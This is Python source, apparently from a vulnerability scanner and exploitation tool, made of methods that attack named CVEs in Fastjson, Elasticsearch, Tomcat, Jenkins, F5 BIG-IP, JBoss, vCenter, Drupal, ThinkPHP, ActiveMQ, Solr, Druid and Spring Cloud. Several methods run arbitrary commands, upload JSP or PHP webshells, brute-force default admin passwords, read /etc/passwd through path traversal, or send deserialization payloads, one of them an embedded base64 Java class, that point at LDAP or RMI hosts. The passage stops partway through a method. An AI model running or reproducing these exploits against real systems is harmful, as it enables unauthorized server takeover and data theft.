def fastjson_1247_exp(self, rmi_ldap):
vul_name = "Fastjson: 1.2.47"
headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
data = {
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": rmi_ldap,
"autoCommit": True
}
}
data = json.dumps(data)
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
r = "Command Executed Successfully (But No Echo)"
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2014_3120_exp(self, cmd):
vul_name = "Elasticsearch: CVE-2014-3120"
self.data_send_info = r'''{ "name": "cve-2014-3120" }'''
self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd)
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
self.r = list(json.loads(
self.req.text)["hits"]["hits"])[0]["fields"]["command"][0]
except:
self.r = "null"
raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2020_13942_exp(self, cmd):
self.threadLock.acquire()
vul_name = "Apache Unomi: CVE-2020-13942"
self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
self.headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Content-Type': 'application/json'
}
try:
req = requests.post(self.url + "/context.json",
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
r = "Command Executed Successfully (But No Echo)"
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def fastjson_1224_2_exp(self, cmd):
vul_name = "Fastjson: VER-1224-2"
headers = {
'User-Agent': self.ua,
'Content-Type': 'application/json',
'Testcmd': cmd,
'Connection': 'close'
}
data = {
"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
"_bytecodes": [
"yv66vgAAADMA6wEAHnlzb3NlcmlhbC9Qd25lcjk0NDQ5MTgyMDEzMzcwMAcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQAZUHduZXI5NDQ0OTE4MjAxMzM3MDAuamF2YQEACXdyaXRlQm9keQEAFyhMamF2YS9sYW5nL09iamVjdDtbQilWAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rCAAJAQAPamF2YS9sYW5nL0NsYXNzBwALAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAA0ADgoADAAPAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwAEQASCgAMABMBAAhzZXRCeXRlcwgAFQEAAltCBwAXAQARamF2YS9sYW5nL0ludGVnZXIHABkBAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsMABsAHAkAGgAdAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DAAfACAKAAwAIQEABjxpbml0PgEABChJKVYMACMAJAoAGgAlAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwAnAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAApACoKACgAKwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwALQAuCgAEAC8BAAdkb1dyaXRlCAAxAQAJZ2V0TWV0aG9kDAAzACAKAAwANAEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwA2AQATamF2YS5uaW8uQnl0ZUJ1ZmZlcggAOAEABHdyYXAIADoBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwA8AQAEQ29kZQEACkV4Y2VwdGlvbnMBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwBAAQANU3RhY2tNYXBUYWJsZQEABWdldEZWAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DABFAEYKAAwARwEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcASQEADWdldFN1cGVyY2xhc3MMAEsALgoADABMAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAjAE4KAEoATwEAImphdmEvbGFuZy9yZWZsZWN0L0FjY2Vzc2libGVPYmplY3QHAFEBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwAUwBUCgBSAFUBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcAVwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABZAFoKAFgAWwEAEGphdmEvbGFuZy9TdHJpbmcHAF0BAAMoKVYMACMAXwoABABgAQAQamF2YS9sYW5nL1RocmVhZAcAYgEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwAZABlCgBjAGYBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsMAGgAaQoAYwBqAQAHdGhyZWFkcwgAbAwAQwBECgACAG4BABNbTGphdmEvbGFuZy9UaHJlYWQ7BwBwAQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7DAByAHMKAGMAdAEABGV4ZWMIAHYBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwAeAB5CgBeAHoBAARodHRwCAB8AQAGdGFyZ2V0CAB+AQASamF2YS9sYW5nL1J1bm5hYmxlBwCAAQAGdGhpcyQwCACCAQAHaGFuZGxlcggAhAEABmdsb2JhbAgAhgEACnByb2Nlc3NvcnMIAIgBAA5qYXZhL3V0aWwvTGlzdAcAigEABHNpemUBAAMoKUkMAIwAjQsAiwCOAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABZAJALAIsAkQEAA3JlcQgAkwEAC2dldFJlc3BvbnNlCACVAQAJZ2V0SGVhZGVyCACXAQAIVGVzdGVjaG8IAJkBAAdpc0VtcHR5AQADKClaDACbAJwKAF4AnQEACXNldFN0YXR1cwgAnwEACWFkZEhlYWRlcggAoQEAB1Rlc3RjbWQIAKMBAAdvcy5uYW1lCAClAQAQamF2YS9sYW5nL1N5c3RlbQcApwEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAKkAqgoAqACrAQALdG9Mb3dlckNhc2UMAK0AcwoAXgCuAQAGd2luZG93CACwAQAHY21kLmV4ZQgAsgEAAi9jCAC0AQAHL2Jpbi9zaAgAtgEAAi1jCAC4AQARamF2YS91dGlsL1NjYW5uZXIHALoBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIHALwBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWDAAjAL4KAL0AvwEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7DADBAMIKAL0AwwEAEWphdmEvbGFuZy9Qcm9jZXNzBwDFAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwwAxwDICgDGAMkBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMACMAywoAuwDMAQACXEEIAM4BAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsMANAA0QoAuwDSAQAEbmV4dAwA1ABzCgC7ANUBAAhnZXRCeXRlcwEABCgpW0IMANcA2AoAXgDZDAAHAAgKAAIA2wEADWdldFByb3BlcnRpZXMBABgoKUxqYXZhL3V0aWwvUHJvcGVydGllczsMAN0A3goAqADfAQATamF2YS91dGlsL0hhc2h0YWJsZQcA4QEACHRvU3RyaW5nDADjAHMKAOIA5AEAE1tMamF2YS9sYW5nL1N0cmluZzsHAOYBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwDoCgDpAGAAIQACAOkAAAAAAAMACgAHAAgAAgA+AAABLwAIAAUAAAD2Egq4ABBOLbYAFE0tEhYGvQAMWQMSGFNZBLIAHlNZBbIAHlO2ACIsBr0ABFkDK1NZBLsAGlkDtwAmU1kFuwAaWSu+twAmU7YALFcqtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAI06BBI5uAAQTi0SOwS9AAxZAxIYU7YAIi0EvQAEWQMrU7YALE0qtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAEg6BBI5uAAQTi0SOwS9AAxZAxIYU7YAIi0EvQAEWQMrU7YALE0qtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAAOxAAIAAABoAGsANwAAAGgAsAA9AAEAQgAAABcAA/cAawcAN/cARAcAPf0ARAcABAcADAA/AAAABAABAEEACgBDAEQAAgA+AAAAfgADAAUAAAA/AU0qtgAwTqcAGS0rtgBITacAFqcAADoELbYATU6nAAMtEgSm/+csAaYADLsASlkrtwBQvywEtgBWLCq2AFywAAEACgATABYASgABAEIAAAAlAAb9AAoHAFgHAAwI/wACAAQHAAQHAF4HAFgHAAwAAQcASgkFDQA/AAAABAABAEEAAQAjAF8AAgA+AAADNgAIAA0AAAI/KrcA6gM2BLgAZ7YAaxJtuABvwABxOgUDNgYVBhkFvqICHxkFFQYyOgcZBwGmAAanAgkZB7YAdU4tEne2AHuaAAwtEn22AHuaAAanAe4ZBxJ/uABvTCvBAIGaAAanAdwrEoO4AG8ShbgAbxKHuABvTKcACzoIpwHDpwAAKxKJuABvwACLOgkDNgoVChkJuQCPAQCiAZ4ZCRUKuQCSAgA6CxkLEpS4AG9MK7YAMBKWA70ADLYANSsDvQAEtgAsTSu2ADASmAS9AAxZAxJeU7YANSsEvQAEWQMSmlO2ACzAAF5OLQGlAAottgCemQAGpwBYLLYAMBKgBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcstgAwEqIFvQAMWQMSXlNZBBJeU7YANSwFvQAEWQMSmlNZBC1TtgAsVwQ2BCu2ADASmAS9AAxZAxJeU7YANSsEvQAEWQMSpFO2ACzAAF5OLQGlAAottgCemQAGpwCNLLYAMBKgBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcSprgArLYArxKxtgB7mQAYBr0AXlkDErNTWQQStVNZBS1TpwAVBr0AXlkDErdTWQQSuVNZBS1TOgwsuwC7WbsAvVkZDLcAwLYAxLYAyrcAzRLPtgDTtgDWtgDauADcBDYELQGlAAottgCemQAIFQSaAAanABAsuADgtgDltgDauADcFQSZAAanAAmECgGn/lwVBJkABqcACYQGAaf937EAAQBfAHAAcwBBAAEAQgAAAN0AGf8AGgAHBwACAAAAAQcAcQEAAPwAFwcAY/8AFwAIBwACAAAHAF4BBwBxAQcAYwAAAv8AEQAIBwACBwAEAAcAXgEHAHEBBwBjAABTBwBBBP8AAgAIBwACBwAEAAcAXgEHAHEBBwBjAAD+AA0ABwCLAf8AYwAMBwACBwAEBwAEBwBeAQcAcQEHAGMABwCLAQcABAAAAvsAVC4C+wBNUQcA5ykLBAIMB/8ABQALBwACBwAEAAcAXgEHAHEBBwBjAAcAiwEAAP8ABwAIBwACAAAAAQcAcQEHAGMAAPoABQA/AAAABAABAEEAAQAFAAAAAgAG"
],
"_name": "lightless",
"_tfactory": {
},
"_outputProperties": {
}
}
data = json.dumps(data)
try:
request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2017_12615_exp(self, cmd):
vul_name = "Apache Tomcat: CVE-2017-12615"
self.name = random_md5()
self.webshell = "/" + self.name + ".jsp/"
self.payload1 = self.name
self.payload2 = self.payload_cve_2017_12615
try:
self.req = requests.put(self.url + self.webshell,
data=self.payload2,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.urlcmd = self.url + "/" + self.name + ".jsp?pwd=password&cmd=" + cmd
self.request = requests.get(self.urlcmd,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.r = "Put Webshell: " + self.urlcmd + "\n-------------------------\n" + self.request.text
raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2018_1000861_exp(self, cmd):
vul_name = "Jenkins: CVE-2018-1000861"
self.c_echo = "echo \":-)\" > $JENKINS_HOME/war/robots.txt;" + cmd + " >> $JENKINS_HOME/war/robots.txt"
self.c_base = base64.b64encode(str.encode(self.c_echo))
self.c_cmd = self.c_base.decode('ascii')
self.cmd = urllib.parse.quote(self.c_cmd)
self.payload = self.payload_cve_2018_1000861.replace(
"RECOMMAND", self.cmd)
try:
self.r = requests.get(self.url + self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.request = requests.get(self.url + "/robots.txt",
headers=self.headers,
timeout=self.timeout,
verify=False)
raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
verify.exploit_print(self.request.text, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2021_22986_exp(self, cmd):
vul_name = "F5 BIG-IP: CVE-2021-22986"
headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Authorization': 'Basic YWRtaW46',
'X-F5-Auth-Token': '',
'Content-Type': 'application/json'
}
data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
"RECOMMAND", cmd)
url = urljoin(self.url, "/mgmt/tm/util/bash")
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = json.loads(request.text)["commandResult"]
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2015_7501_exp(self, cmd):
vul_name = "RedHat JBoss: CVE-2015-7501"
self.path = "/invoker/JMXInvokerServlet"
self.headers = {
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': self.ua,
"Connection": "close"
}
try:
self.req = requests.post(self.url + self.path,
data=self.payload_cve_2015_7501,
headers=self.headers,
timeout=self.timeout,
verify=False)
time.sleep(0.5)
self.cmd = urlencode({"ppp": cmd})
self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
self.cmd,
headers=self.headers,
timeout=self.timeout,
verify=False)
r = self.url + "/jexinv4/jexinv4.jsp?" + self.cmd
r += "\n"
r += self.request.text
self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2021_21972_exp(self, cmd, os_type):
vul_name = "Vmware vCenter: CVE-2021-21972"
headers = {
"User-Agent": self.ua,
"Accept": "*/*",
"Connection": "close"
}
try:
cmd = cmd
path = os.path.split(os.path.realpath(sys.argv[0]))[0]
if os_type == "linux":
shell_tar = path + "/payload/payload/cve202121972_linux_shell.tar"
else:
shell_tar = path + "/payload/payload/cve202121972_windows_shell.tar"
file = {'uploadFile': open(shell_tar, 'rb')}
url = requests.compat.urljoin(
self.url, "/ui/vropspluginui/rest/services/uploadova")
req = requests.post(url,
files=file,
headers=headers,
timeout=self.timeout,
verify=False)
url = requests.compat.urljoin(self.url, "/ui/resources/shell.jsp")
r = "Payload: " + shell_tar + "\n" + "Behiner jsp webshell (default password:rebeyond) : " + url
self.raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2019_6340_exp(self, cmd):
vul_name = "Drupal: CVE-2019-6340"
self.path = "/node/?_format=hal_json"
self.cmd_len = len(cmd)
self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
self.url)
self.headers = {
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/hal+json",
'Accept': "*/*",
'Cache-Control': "no-cache"
}
try:
request = requests.post(self.url + self.path,
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2019_3799_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Spring Cloud: CVE-2019-3799"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
self.vul_info["vul_name"] = "Spring-Cloud-Config-Server Directory Traversal"
self.vul_info["vul_numb"] = "CVE-2019-3799"
self.vul_info["vul_apps"] = "Spring"
self.vul_info["vul_date"] = "2019-04-22"
self.vul_info["vul_vers"] = "2.1.0-2.1.1, 2.0.0-2.0.3, 1.4.0-1.4.5"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Directory Traversal"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "由于spring-cloud-config-server模块未对传入路径进行安全限制," \
"攻击者可以利用多个..%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。"
self.vul_info["cre_date"] = "2021-01-27"
self.vul_info["cre_auth"] = "zhzyker"
try:
request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False)
if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text:
self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_5410_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Spring Cloud: CVE-2020-5410"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a"
self.vul_info["vul_name"] = "Spring Cloud Config目录穿越漏洞"
self.vul_info["vul_numb"] = "CVE-2020-5410"
self.vul_info["vul_apps"] = "Spring"
self.vul_info["vul_date"] = "2020-06-02"
self.vul_info["vul_vers"] = "< 2.2.3, < 2.1.9"
self.vul_info["vul_risk"] = "medium"
self.vul_info["vul_type"] = "目录穿越漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x" \
"版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。" \
"恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。"
self.vul_info["cre_date"] = "2021-01-26"
self.vul_info["cre_auth"] = "zhzyker"
try:
request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False)
if request.status_code == 200:
if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text:
self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25646_exp(self, cmd):
vul_name = "Apache Druid: CVE-2021-25646"
url = urljoin(self.url, "/druid/indexer/v1/sampler")
headers = {
'Content-Type': 'application/json',
'User-Agent': self.ua,
'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
'Connection': 'keep-alive'
}
data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = "Command Executed Successfully (But No Echo)"
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def fastjson_1224_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.24"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2017-18349"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2017-03-15"
self.vul_info["vul_vers"] = "<= 1.2.24"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
self.vul_info["cre_date"] = "2021-01-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Content-Type': "application/json",
'Connection': 'close'
}
md = dns_request()
dns = md
data = {
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://" + dns + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2019_9082_exp(self, cmd):
vul_name = "ThinkPHP: CVE-2019-9082"
self.payload = self.payload_cve_2019_9082.replace("RECOMMAND", cmd)
try:
request = requests.get(self.url + self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
r = request.text
if cmd == "upload":
self.filename = input("[+] WebShell Name (vulmap.php): ")
self.shellpass = input("[+] WebShell Password (123456): ")
self.payload = self.payload_cve_2019_9082_webshell.replace(
"FILENAME", self.filename).replace("SHELLPASS",
self.shellpass)
request = requests.get(self.url + self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
r = "WebShell: " + self.url + "/" + self.filename
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2016_3088_exp(self, cmd):
self.threadLock.acquire()
vul_name = "Apache AcitveMQ: CVE-2016-3088"
self.path = "null"
self.name = random_md5()
self.webshell = "/" + self.name + ".jsp"
self.exp = self.jsp_webshell
self.passlist = [
"admin:123456", "admin:admin", "admin:123123", "admin:activemq",
"admin:12345678"
]
try:
for self.pa in self.passlist:
self.base64_p = base64.b64encode(str.encode(self.pa))
self.p = self.base64_p.decode('utf-8')
self.headers_base64 = {
'User-Agent': self.ua,
'Authorization': 'Basic ' + self.p
}
self.request = requests.get(self.url +
"/admin/test/systemProperties.jsp",
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.request.status_code == 200:
self.path = \
re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
break
self.request = requests.put(self.url + "/fileserver/v.txt",
headers=self.headers_base64,
data=self.exp,
timeout=self.timeout,
verify=False)
self.headers_move = {
'User-Agent':
self.ua,
'Destination':
'file://' + self.path + '/webapps/api' + self.webshell
}
self.request = requests.request("MOVE",
self.url + "/fileserver/v.txt",
headers=self.headers_move,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.request = requests.get(self.url + "/api" + self.webshell +
"?pwd=password&cmd=" + cmd,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n"
self.r += self.request.text
verify.exploit_print(self.r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2019_0193_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2019-0193"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2019-10-16"
self.vul_info["vul_vers"] = "< 8.2.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
"在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
self.vul_info["cre_auth"] = "zhzyker"
core_name = "null"
md = random_md5()
cmd = "echo " + md
payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8'))
solrhost = self.hostname + ":" + str(self.port)
headers = {
'Host': "" + solrhost,
'User-Agent': self.ua,
'Accept': "application/json, text/plain, */*",
'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
'Accept-Encoding': "zip, deflate",
'Referer': self.url + "/solr/",
'Content-type': "application/x-www-form-urlencoded",
'X-Requested-With': "XMLHttpRequest",
'Connection': "close"
}
urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json"
request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False)
url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False)
if request.status_code == 200 and core_name != "null":
self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["prt_info"] = "[maybe] [core name:" + url_cmd + "] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_13942_poc(self):
self.threadLock.acquire()
